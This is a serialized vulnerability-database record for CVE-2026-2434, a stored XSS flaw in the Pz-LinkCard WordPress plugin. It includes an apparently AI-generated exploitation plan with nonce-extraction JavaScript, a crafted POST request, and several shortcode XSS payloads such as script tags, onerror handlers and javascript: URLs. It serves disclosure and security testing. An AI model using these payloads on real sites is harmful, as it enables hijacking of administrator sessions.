[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f27bhN3S_HGKEwZUHGCVDFXCAjTiUdD9PIpphKT68SRI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":25,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":29},"CVE-2026-2434","pz-linkcard-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","Pz-LinkCard \u003C= 2.5.8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Pz-LinkCard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'blogcard' shortcode attributes in all versions up to, and including, 2.5.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","pz-linkcard",null,"\u003C=2.5.8.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-17 09:44:19","2026-04-17 22:27:13",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F687ffac2-1f07-4adb-ba12-5f2ea357ea7e?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-2434 (Pz-LinkCard Stored XSS)\n\n## 1. Vulnerability Summary\nThe **Pz-LinkCard** plugin (up to version 2.5.8.1) is vulnerable to Stored Cross-Site Scripting (XSS) due to improper sanitization and escaping of attributes within its core shortcode, `[blogcard]`. While the plugin is designed to create visual \"cards\" for links, it fails to sufficiently neutralize user-supplied input when rendering the HTML for these cards. An authenticated attacker with **Contributor** privileges or higher can embed malicious JavaScript within shortcode attributes. When the post is rendered (either in the editor preview or on the frontend), the script executes in the context of the viewing user, potentially leading to administrative session hijacking.\n\n## 2. Attack Vector Analysis\n*   **Shortcode Name:** `blogcard` (inferred from description)\n*   **Vulnerable Attributes:** Likely candidates include `class`, `url`, `title`, or `target` (inferred based on common link-card plugin structures).\n*   **Authentication Level:** Authenticated (Contributor+). Contributors can create posts and use shortcodes but cannot publish or use `unfiltered_html`.\n*   **Endpoint:** Post Editor (`wp-admin\u002Fpost.php` or `wp-admin\u002Fpost-new.php`).\n*   **Injection Point:** The `content` parameter of a post-save\u002Fupdate request.\n*   **Preconditions:** The Pz-LinkCard plugin must be active.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode using `add_shortcode( 'blogcard', [ $this, 'render_shortcode' ] )`.\n2.  **Input:** A Contributor saves a post containing: `[blogcard class='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`.\n3.  **Processing:** When the page is viewed, WordPress calls the shortcode's callback function.\n4.  **Attribute Handling:** The callback likely uses `shortcode_atts()` to merge user input with defaults.\n5.  **Vulnerable Sink:** The function constructs an HTML string (e.g., `\u003Cdiv class=\"' . $atts['class'] . '\">...\u003C\u002Fdiv>`) and returns it without applying `esc_attr()` or `esc_html()` to the attributes.\n6.  **Rendering:** WordPress echoes the returned HTML, triggering the XSS in the browser.\n\n## 4. Nonce Acquisition Strategy\nSince this is an **Authenticated (Contributor+)** vulnerability, the attacker needs a valid WordPress session and a post-editing nonce (`_wpnonce`) to save a post.\n\n1.  **Login:** Use `browser_navigate` to log in as a Contributor.\n2.  **Navigate to Editor:** Go to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce:** Use `browser_eval` to extract the `_wpnonce` from the post form.\n    *   **JavaScript:** `document.querySelector('#_wpnonce')?.value`\n4.  **Extract Post ID:** Get the `post_ID` from the hidden input field or URL.\n    *   **JavaScript:** `document.querySelector('#post_ID')?.value`\n\n## 5. Exploitation Strategy\n\n### Step 1: Authentication and Session Setup\n*   Log in to the WordPress instance using the provided Contributor credentials.\n*   Maintain the cookie session for subsequent `http_request` calls.\n\n### Step 2: Post Creation and Payload Injection\nSend an `http_request` to save a draft post containing the malicious shortcode.\n\n*   **URL:** `https:\u002F\u002F[target]\u002Fwp-admin\u002Fpost.php`\n*   **Method:** `POST`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Payload:**\n    ```\n    action=editpost\n    &post_ID=[POST_ID]\n    &_wpnonce=[NONCE]\n    &post_title=XSS_Test\n    &content=[blogcard class='\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>']\n    &post_status=draft\n    ```\n    *(Note: If `class` is not vulnerable, try attributes `url`, `title`, or `target`)*.\n\n### Step 3: Triggering the XSS\n*   As an Admin or the Contributor, navigate to the post's preview URL or view the post in the editor.\n*   **URL:** `https:\u002F\u002F[target]\u002F?p=[POST_ID]&preview=true`\n\n## 6. Test Data Setup\n1.  **User Creation:** `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n2.  **Plugin Setup:** Ensure `pz-linkcard` is installed and activated.\n3.  **Initial Post:** Use the `browser_navigate` tool to open the editor and generate the initial `post_ID`.\n\n## 7. Expected Results\n*   The HTTP response for the post update should be a `302` redirect back to the editor.\n*   Upon navigating to the post preview, the browser should execute the JavaScript.\n*   In the rendered HTML source, you should see the broken attribute:\n    `\u003Cdiv class=\"\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>\" ...>`\n\n## 8. Verification Steps\n1.  **Database Check:** Use `wp post get [POST_ID] --field=post_content` to verify the shortcode is stored correctly in the database.\n2.  **HTML Source Audit:** Use `http_request` (GET) on the post URL and check if the payload is rendered without escaping:\n    ```bash\n    # Check if script tags exist in the output\n    curl -s \"http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]\" | grep \"\u003Cscript>alert\"\n    ```\n\n## 9. Alternative Approaches\nIf the `class` attribute is sanitized, try breaking out of other potential HTML contexts within the shortcode:\n\n*   **URL Context:** `[blogcard url='javascript:alert(1)']`\n*   **Image Context:** `[blogcard image='x\" onerror=\"alert(1)']`\n*   **Style Context:** `[blogcard style='background:url(\"javascript:alert(1)\")']`\n*   **Title\u002FText Context:** `[blogcard title='\u003C\u002Ftitle>\u003Cscript>alert(1)\u003C\u002Fscript>']`\n\nIf the standard `post.php` endpoint is hardened, attempt to inject via the **Gutenberg Block Editor** (REST API) if the plugin provides a dedicated block that uses the same underlying rendering function.","The Pz-LinkCard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'blogcard' shortcode attributes in all versions up to, and including, 2.5.8.1. This is due to insufficient input sanitization and output escaping on attributes such as 'class' or 'url', allowing authenticated attackers with Contributor-level access and above to inject arbitrary web scripts into pages.","1. Log in to the WordPress site with a user account having Contributor-level privileges or higher.\n2. Create a new post or edit an existing one through the WordPress editor.\n3. Insert a 'blogcard' shortcode containing a malicious payload within one of its attributes. For example, use the 'class' attribute to break out of the HTML context: [blogcard class='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>'].\n4. Save the post as a draft or update it. Since Contributors cannot publish, the exploit is usually triggered via the preview function or when an Editor\u002FAdmin views the draft.\n5. Navigate to the post's preview URL or the live page if published. The injected JavaScript will execute in the context of the viewing user's session.","gemini-3-flash-preview","2026-04-20 20:12:13","2026-04-20 20:12:30",{"type":30,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":31},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpz-linkcard\u002Ftags"]